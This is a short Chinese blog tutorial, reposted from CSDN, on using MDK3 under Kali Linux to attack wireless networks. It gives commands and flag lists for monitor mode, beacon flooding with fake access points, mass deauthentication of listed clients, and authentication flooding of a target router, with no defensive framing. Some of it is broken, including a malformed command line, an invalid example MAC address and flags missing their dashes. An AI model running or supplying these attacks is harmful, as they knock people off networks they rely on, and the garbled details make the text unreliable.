使用Kali MDK3无线攻击

mdk3 <接口> <测试_模块> [测试选项] 例:mdk3 --wlan0mon b (通过mdk3 使用网卡接口调用b类测试模块发起攻击)
请注意该mdk3软件在使用时必须打开网卡捕获功能可以打开一个命令窗口输入
airmon-ng start wlan0 (激活网卡监听功能)

mdk3 wlan0mon b -f /root/wifi.txt -a -s 1500 (通过MDK3使用网卡接口调用B类测试模块 使用root目录下的wifi.txt文件列表制作一个WPA/2加密的WIFI信号并且传输速率为 1500)
所有参数
-f <WIFI名称列表文件的所在位置> 使用此WIFI列表发起信号溢出攻击
-v <带WIFI名称和MAC地址的对应文件所在位置> 使用此WIFI列表和MAC地址列表发起信号溢出攻击
-w 加密方式为WEP
-t 加密方式为WPA/PSK
-a 加密方式为WPA/2
-g 54M模式
-m 读取数据库中的MAC地址列表
-c <信道数> 设置这些伪造的这些WIFI信号的信道数
-s <帧数> 设置广播这些伪造WIFI数据包的速度,速度越快用户接受到的列表越多越快,但是对网卡有一定影响

mdk3 wlan0mon d -b /root/wifi.txt -c 1 -s 1000(通过MDK3使用网卡接口调用D类测试模块 使用root目录下的wifi.txt文件里的MAC地址列表向路由器发出只要黑名单<WIFI.TXT>里的MAC地址全部强制解除认证 该方法只能攻击WIFI信道为1的WIFI信号并且设置发送速度为1000)
所有参数
-w <白名单文件的位置> MAC地址白名单里的所有MAC地址都能正常连接WIFI
-b <黑名单文件的位置> MAC地址黑名单里的所有MAC地址全部解除与路由器的连接
-s <帧数> 设置广播数据包的速度 ,帧数越大,传播速度越快
-c <信道数> 设置要攻击的WIFI信道

mdk3 wlan0mon a -a M2:B6:N4:N2:H7:J0 -m /root/wifi.txt (通过MDK3使用网卡接口调用A类测试模块 使用root目录下的wifi.txt文件来攻击MAC地址为M2:B6:N4:N2:H7:J0的路由器)
所有参数
-a 通过文件里的MAC地址去攻击并且检测被攻击路由器是否有文件中的MAC地址
m 调用数据库中的连接MAC地址
c 不测试被攻击的路由器里有没有文件里的MAC地址(与-a用法相反)
i d对指定路由器MAC地址自动攻击(不用自己创建MAC地址列表文件)
s <帧数> 设置广播数据包的速度 ,帧数越大,传播速度越快

————————————————
版权声明:本文为CSDN博主「我不是猫叔」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/JN_Cat/article/details/102302748

原文地址:https://www.cnblogs.com/moegarn/p/11966609.html